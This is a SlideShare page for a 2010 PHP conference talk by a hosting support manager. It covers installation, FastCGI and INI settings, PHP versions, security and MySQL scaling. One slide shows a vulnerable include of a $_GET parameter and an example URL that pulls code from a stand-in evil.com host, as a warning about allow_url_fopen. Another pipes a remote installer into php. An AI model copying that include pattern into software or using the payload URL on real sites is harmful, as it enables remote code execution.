PHP	
  through	
  the	
  eyes	
  of	
  a	
  hoster
Thijs	
  Feryn
Support	
  manager
+32	
  (0)9	
  218	
  79	
  06
thijs@...
About	
  me
I’m	
  the	
  support	
  manager	
  at	
  Combell
About	
  me
I’m	
  a	
  board	
  member	
  at	
  PHPBenelux
I	
  live	
  in	
  the	
  wonderful	
  city	
  of	
  Bruges
MPBecker	
  -­‐	
  Bruges	
  by	
  Night	
  hOp://www.flickr.co...
Follow	
  me	
  on	
  Twi0er:	
  @ThijsFeryn
Rate	
  my	
  talk:	
  h0p://joind.in
Read	
  my	
  blog:	
  h0p://blog.feryn...
Chapter	
  I	
  :	
  The	
  hoster,	
  a	
  genuine	
  stakeholder	
  in	
  the	
  
PHP	
  universe
Stakeholders
Customer Development	
  company
Endusers MGMT
Internal
IT
Internal
PM
Devs
Sales
MGMT
QA
Design
Systeam
PM
Co...
Stakeholders
Your	
  app	
  needs	
  to	
  be	
  hosted
Somewhere	
  along	
  the	
  road	
  ...
Goals	
  &	
  moKves
Our	
  goals	
  &	
  mo]ves	
  are	
  the	
  same	
  as	
  yours:
• It	
  has	
  to	
  work
• It	
  h...
Chapter	
  II:	
  InstallaKon	
  &	
  configuraKon
Installing	
  from	
  source
server$	
  ./configure	
  -­‐-­‐prefix=/usr/local/php-­‐5.2.10	
  
-­‐-­‐with-­‐apxs2=/usr/lo...
Installing	
  using	
  a	
  package	
  manager	
  (APT/ApKtude)
Install	
  PHP:
Install	
  MySQL	
  library	
  for	
  PHP:...
SAPI	
  ...	
  schmapi
Mod_php FastCGI CLI
Web Apache	
  module gateway -­‐
Process Apache	
  process php-­‐cgi php
Configu...
FastCGI
Example	
  config:
• Apache	
  handler
	
  	
  <IfModule	
  mod_fcgid.c>
	
  	
  	
  	
  SuexecUserGroup	
  dev	
  ...
FastCGI
Example	
  config:
• Wrapper	
  script
#!/bin/sh
PHPRC=/usr/local/php-­‐5.3.1/etc
export	
  PHPRC
export	
  PHP_FCG...
INI	
  seQngs:	
  tales	
  of	
  good	
  &	
  evil
INI	
  seQngs:	
  tales	
  of	
  good	
  &	
  evil
Defining	
  INI	
  se<ngs:
• Php.ini
• Ini_set()
• “-­‐d”	
  
• php_valu...
INI	
  seQngs:	
  tales	
  of	
  good	
  &	
  evil
Memory_limit:
Fatal	
  error:	
  Allowed	
  memory	
  size	
  of	
  167...
INI	
  seQngs:	
  tales	
  of	
  good	
  &	
  evil
Safe_mode	
  &	
  Open_basedir:
<IfModule	
  mod_php5.c>
	
  	
  	
  	
...
INI	
  seQngs:	
  tales	
  of	
  good	
  &	
  evil
Allow_url_fopen:
<?php
$lang= $_GET['lang'];
require("$lang.php");
http...
Chapter	
  III:	
  Versions	
  &	
  features
PHP	
  4:	
  End	
  of	
  life,	
  but	
  far	
  from	
  dead
PHP	
  4:	
  End	
  of	
  life,	
  but	
  far	
  from	
  dead
Parse	
  error:	
  syntax	
  error,	
  unexpected	
  T_STRIN...
Developers	
  love	
  bling	
  bling
It	
  HAS	
  to	
  be	
  PHP	
  5.3.2	
  !!!
I	
  need	
  ALL	
  PHP	
  extension	
  !!!
I	
  use	
  ALL	
  PHP	
  features	
  !!!
Fruit	
  &	
  vegetables:	
  PEAR	
  &	
  PECL
Fruit	
  &	
  vegetables:	
  PEAR	
  &	
  PECL
PEAR
PHP	
  Extension	
  and	
  Applica]on	
  Repository	
  (h#p//pear.php....
Fruit	
  &	
  vegetables:	
  PEAR	
  &	
  PECL
PECL	
  (pickle)
PHP	
  Extension	
  Community	
  Library	
  (h#p//pecl.php...
Popular	
  frameworks	
  outside	
  the	
  PHP	
  project
External	
  frameworks
Chapter	
  IV:	
  PHP	
  a0racts	
  a	
  crowd
It’s	
  easy	
  !
That	
  easy	
  !
<?php
echo "Hello world!";
It’s	
  cheap	
  !
It’s	
  stable	
  !
Everyone	
  can	
  be	
  a	
  PHP	
  developer
But	
  not	
  everyone	
  has	
  what	
  it	
  takes
Luckily	
  there’s	
  a	
  lot	
  ready-­‐to-­‐use	
  PHP	
  soiware	
  out	
  there
Who	
  you	
  gonna	
  call	
  ?
But	
  when	
  helpers	
  need	
  help	
  ...
They	
  reach	
  out	
  to	
  the	
  PHP	
  community
Blogs
Forums
User	
  Group	
  mee]ngs
Conferences
PHP.net
TwiOer
IRC
Chapter	
  V:	
  Here	
  be	
  phpirates
Here	
  be	
  phpirates
Fact
“The	
  majority	
  of	
  hacking/absue	
  cases	
  are	
  PHP	
  related”
False	
  assumpKons
“Open	
  source	
  is	
  evil”
“PHP	
  has	
  lots	
  of	
  security	
  vulnerabili]es	
  and	
  is	
 ...
Here	
  be	
  phpirates
The	
  real	
  issues
• Quality	
  of	
  the	
  code
• Network	
  &	
  server	
  security
• PHP	
 ...
ResponsibiliKes
Chapter	
  VI:	
  Scalability
Performance	
  ==	
  speed
Scalability	
  ==	
  constant	
  speed	
  under	
  increasing	
  load
Scaling	
  up
Scaling	
  out
Developers	
  (some2mes)	
  forget	
  ...
Scaling	
  MySQL
mysql>	
  explain	
  SELECT	
  field1,	
  (SELECT	
  COUNT(*)	
  FROM	
  table2	
  WHERE	
  field3	
  =	
  
table1.id)	
  ...
mysql>	
  show	
  processlist;
+-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐+-­...
Scaling	
  MySQL	
  with	
  replicaKon
PHP	
  scalability	
  toolbox
Memcached
Gearman
Varnish
Summary
Summary
1.Hosters	
  are	
  a	
  genuine	
  stakeholder	
  in	
  the	
  PHP	
  universe
2.PHP	
  is	
  highly	
  flexible	
...
Q&A
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Php through the eyes of a hoster pbc10
Upcoming SlideShare
Loading in...5
×

Php through the eyes of a hoster pbc10

3,216

Published on

Slides for my "PHP through the eyes of a hoster" talk at PHP Barcelona Conference 2010

Published in: Technology
1 Comment
1 Like
Statistics
Notes
No Downloads
Views
Total Views
3,216
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
1
Likes
1
Embeds 0
No embeds

No notes for slide

Php through the eyes of a hoster pbc10

  1. 1. PHP  through  the  eyes  of  a  hoster Thijs  Feryn Support  manager +32  (0)9  218  79  06 thijs@combellgroup.com PHP  Barcelona  Conference Saturday  October  30th  2010 Barcelona  Spain
  2. 2. About  me I’m  the  support  manager  at  Combell
  3. 3. About  me I’m  a  board  member  at  PHPBenelux
  4. 4. I  live  in  the  wonderful  city  of  Bruges MPBecker  -­‐  Bruges  by  Night  hOp://www.flickr.com/photos/galverson2/3715965933
  5. 5. Follow  me  on  Twi0er:  @ThijsFeryn Rate  my  talk:  h0p://joind.in Read  my  blog:  h0p://blog.feryn.eu
  6. 6. Chapter  I  :  The  hoster,  a  genuine  stakeholder  in  the   PHP  universe
  7. 7. Stakeholders Customer Development  company Endusers MGMT Internal IT Internal PM Devs Sales MGMT QA Design Systeam PM Consultants Hoster PHP  community
  8. 8. Stakeholders Your  app  needs  to  be  hosted Somewhere  along  the  road  ...
  9. 9. Goals  &  moKves Our  goals  &  mo]ves  are  the  same  as  yours: • It  has  to  work • It  has  to  perform • It  has  to  scale • It  has  to  be  secure • It  has  to  be  available
  10. 10. Chapter  II:  InstallaKon  &  configuraKon
  11. 11. Installing  from  source server$  ./configure  -­‐-­‐prefix=/usr/local/php-­‐5.2.10   -­‐-­‐with-­‐apxs2=/usr/local/httpd-­‐2.2.12/bin/apxs  -­‐-­‐ with-­‐zlib  -­‐-­‐with-­‐curl  -­‐-­‐with-­‐gd  -­‐-­‐enable-­‐mbstring   -­‐-­‐with-­‐mysql  -­‐-­‐with-­‐mysqli  -­‐-­‐enable-­‐pcntl  -­‐-­‐with-­‐ pdo-­‐mysql  -­‐-­‐with-­‐readline  -­‐-­‐enable-­‐soap  -­‐-­‐with-­‐xsl   -­‐-­‐with-­‐mcrypt  -­‐-­‐with-­‐mssql  -­‐-­‐with-­‐snmp  -­‐-­‐with-­‐imap   -­‐-­‐with-­‐kerberos  -­‐-­‐with-­‐imap-­‐ssl  -­‐-­‐with-­‐config-­‐ file-­‐path=/etc/php5/  -­‐-­‐enable-­‐sockets  -­‐-­‐with-­‐ freetype-­‐dir  -­‐-­‐with-­‐openssl   server$  make server$  make  install
  12. 12. Installing  using  a  package  manager  (APT/ApKtude) Install  PHP: Install  MySQL  library  for  PHP: server$  apt-­‐get  install  php5 server$  apt-­‐get  install  php5-­‐mysql
  13. 13. SAPI  ...  schmapi Mod_php FastCGI CLI Web Apache  module gateway -­‐ Process Apache  process php-­‐cgi php Configura]on Apache  conf  files wrapper on  the  fly User Apache  user shell  user  or   suexec  user shell  user
  14. 14. FastCGI Example  config: • Apache  handler    <IfModule  mod_fcgid.c>        SuexecUserGroup  dev  dev        PHP_Fix_Pathinfo_Enable  1        <Directory  /var/www/dev/www/>            Options  +ExecCGI            AllowOverride  All            AddHandler  fcgid-­‐script  .php            FCGIWrapper  /var/www/dev/etc/fcgi.wrapper  .php            Order  allow,deny            Allow  from  all        </Directory>    </IfModule>
  15. 15. FastCGI Example  config: • Wrapper  script #!/bin/sh PHPRC=/usr/local/php-­‐5.3.1/etc export  PHPRC export  PHP_FCGI_MAX_REQUESTS=5000 export  PHP_FCGI_CHILDREN=8 exec  /usr/local/php-­‐5.3.1/bin/php-­‐cgi
  16. 16. INI  seQngs:  tales  of  good  &  evil
  17. 17. INI  seQngs:  tales  of  good  &  evil Defining  INI  se<ngs: • Php.ini • Ini_set() • “-­‐d”   • php_value • php_flag • php_admin_value • php_admin_flag
  18. 18. INI  seQngs:  tales  of  good  &  evil Memory_limit: Fatal  error:  Allowed  memory  size  of  16777216   bytes  exhausted  (tried  to  allocate  35  bytes)
  19. 19. INI  seQngs:  tales  of  good  &  evil Safe_mode  &  Open_basedir: <IfModule  mod_php5.c>        php_admin_flag  engine  on        php_admin_flag  safe_mode  off        php_admin_value  open_basedir  "/var/www/vhosts/ website.com/httpdocs:/tmp" </IfModule>
  20. 20. INI  seQngs:  tales  of  good  &  evil Allow_url_fopen: <?php $lang= $_GET['lang']; require("$lang.php"); http://domain.ext/index.php?lang=http://evil.com/hack.txt?
  21. 21. Chapter  III:  Versions  &  features
  22. 22. PHP  4:  End  of  life,  but  far  from  dead
  23. 23. PHP  4:  End  of  life,  but  far  from  dead Parse  error:  syntax  error,  unexpected  T_STRING,   expecting  T_OLD_FUNCTION  or  T_FUNCTION  or  T_VAR   or  '}'  in  test.php  on  line  4
  24. 24. Developers  love  bling  bling
  25. 25. It  HAS  to  be  PHP  5.3.2  !!!
  26. 26. I  need  ALL  PHP  extension  !!!
  27. 27. I  use  ALL  PHP  features  !!!
  28. 28. Fruit  &  vegetables:  PEAR  &  PECL
  29. 29. Fruit  &  vegetables:  PEAR  &  PECL PEAR PHP  Extension  and  Applica]on  Repository  (h#p//pear.php.net) server$  pear  install  date server$  lynx  -­‐source  http://pear.php.net/go-­‐pear  |  php
  30. 30. Fruit  &  vegetables:  PEAR  &  PECL PECL  (pickle) PHP  Extension  Community  Library  (h#p//pecl.php.net) server$  pecl  install  pecl_http
  31. 31. Popular  frameworks  outside  the  PHP  project External  frameworks
  32. 32. Chapter  IV:  PHP  a0racts  a  crowd
  33. 33. It’s  easy  !
  34. 34. That  easy  ! <?php echo "Hello world!";
  35. 35. It’s  cheap  !
  36. 36. It’s  stable  !
  37. 37. Everyone  can  be  a  PHP  developer
  38. 38. But  not  everyone  has  what  it  takes
  39. 39. Luckily  there’s  a  lot  ready-­‐to-­‐use  PHP  soiware  out  there
  40. 40. Who  you  gonna  call  ?
  41. 41. But  when  helpers  need  help  ...
  42. 42. They  reach  out  to  the  PHP  community Blogs Forums User  Group  mee]ngs Conferences PHP.net TwiOer IRC
  43. 43. Chapter  V:  Here  be  phpirates
  44. 44. Here  be  phpirates
  45. 45. Fact “The  majority  of  hacking/absue  cases  are  PHP  related”
  46. 46. False  assumpKons “Open  source  is  evil” “PHP  has  lots  of  security  vulnerabili]es  and  is  not  mature”
  47. 47. Here  be  phpirates The  real  issues • Quality  of  the  code • Network  &  server  security • PHP  version  &  configura]on
  48. 48. ResponsibiliKes
  49. 49. Chapter  VI:  Scalability
  50. 50. Performance  ==  speed
  51. 51. Scalability  ==  constant  speed  under  increasing  load
  52. 52. Scaling  up
  53. 53. Scaling  out
  54. 54. Developers  (some2mes)  forget  ...
  55. 55. Scaling  MySQL
  56. 56. mysql>  explain  SELECT  field1,  (SELECT  COUNT(*)  FROM  table2  WHERE  field3  =   table1.id)  FROM  table1  WHERE  field2  =  1    ORDER  BY  field4  DESC  limit   12,12; ***************************  1.  row  ***************************                      id:  1    select_type:  PRIMARY                table:  table1                  type:  ALL possible_keys:  approved                    key:  approved            key_len:  NULL                    ref:  NULL                  rows:  3143                Extra:  Using  where;  Using  filesort ***************************  2.  row  ***************************                      id:  2    select_type:  DEPENDENT  SUBQUERY                table:  table2                  type:  ALL possible_keys:  NULL                    key:  NULL            key_len:  NULL                    ref:  NULL                  rows:  1005                Extra:  Using  where
  57. 57. mysql>  show  processlist; +-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐ +-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+ |  Id        |  User  |  Host            |  db  |  Command  |  Time  |  State                                |  Info                                                                                         | +-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐ +-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+ |  63515  |  root  |  localhost  |  db  |  Query      |        0  |  NULL                                  |  show   processlist                                                                | |  81763  |  root  |  localhost  |  db  |  Sleep      |    105  |                                            |  NULL                                                                                         | |  85187  |  root  |  localhost  |  db  |  Query      |        0  |  Sending  data                  |  SELECT   data  from  someTable  where  field  =  'val'    | |  82701  |  root  |  localhost  |  db  |  Query      |        0  |  Copying  to  tmp  table  |  SELECT   data  from  someTable  where  field='val2'      | |  82709  |  root  |  localhost  |  db  |  Query      |        0  |  Sorting  result              |  SELECT   data  from  someTable  where  order  by  field  | |  82716  |  root  |  localhost  |  db  |  Query      |        0  |  Opening  tables              |  SELECT   data  from  someOtherTable                                  | +-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐+-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐ +-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐-­‐+
  58. 58. Scaling  MySQL  with  replicaKon
  59. 59. PHP  scalability  toolbox
  60. 60. Memcached
  61. 61. Gearman
  62. 62. Varnish
  63. 63. Summary
  64. 64. Summary 1.Hosters  are  a  genuine  stakeholder  in  the  PHP  universe 2.PHP  is  highly  flexible  &  configurable.  Hosters  have  to  ensure  a  decent   setup 3.PHP  has  a  lot  to  offer  feature-­‐wise 4.PHP  aOracts  a  crowd  and  brings  a  lot  of  people  together  from   different  industries  (e.g.  hosters) 5.Lots  of  abuse  cases  are  PHP  related,  but  that’s  not  the  fault  of  PHP   itself 6.PHP  itself  doesn’t  scale  *that*  well,  but  is  flexible  enough  to  ensure   scalability  via  extra  tools
  65. 65. Q&A

×